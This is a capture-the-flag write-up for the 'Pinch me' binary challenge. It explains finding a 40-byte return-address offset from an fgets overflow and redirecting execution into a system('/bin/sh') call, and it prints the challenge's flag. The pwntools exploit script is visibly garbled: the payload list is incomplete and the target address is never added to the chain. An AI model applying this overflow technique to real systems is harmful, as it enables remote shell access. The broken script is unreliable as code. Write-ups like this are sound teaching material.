Rating:

# Pinch me

## Description

This should be easy!

[pinch_me](pinch_me)

## Solution

First step let's decompile the binary with Ghidra. In the main function (the binary is not stripped) we can easily find the function vuln and after a brief looking it was easy to spot the buffer overflow vulnerability: an fgets writes 100 bytes of input in an array of 24 bytes.

![img1](img/img1.png)

How many bytes we need to give to the fgets in order to hit the return address? Let's open up the binary with GDB and using an older trick let's give an input like AAAABBBBCCCCDDDD..., now we can inspect the memory and after the RET instruction we can see that the process try to return to address 0xKKKK, so we have find the offset of the return address: 40.

![img2](img/img2.png)

The next step is to rewrite the return address with somethings interesting to get the control of the remote machine.


00401190: 48 89 c7 MOV RDI,RAX
00401193: e8 c8 fe ff ff CALL fgets
00401198: 81 7d f8 de c0 37 13 CMP dword ptr [RBP + local_10], 0x1337c0de
0040119f: 75 0e JNZ LAB_004011af
004011a1: 48 8d 3d 9f 0e 00 00 LEA RDI, [0x402047] = "/bin/sh"
004011a8: e8 93 fe ff ff CALL system
004011ad: eb 23 JMP LAB_004011d2


We need to jump not at the call system address, cause we don't have the right parameter in RDI, so I try to jump one instruction before, this ensure to load the address of /bin/sh into the RDI register.

We can improve the script by inserting a rop-chian jump to 0x4011a1 without any parameter:

python
from pwn import *

offset = 40

context.arch = 'amd64'
elf = ELF('./pinch_me')
p = remote('dctf1-chall-pinch-me.westeurope.azurecontainer.io', 7480)

rop = ROP(elf)

b"A" * offset,
rop.chain()
]

#### **FLAG >>** dctf{y0u_kn0w_wh4t_15_h4pp3n1ng_b75?}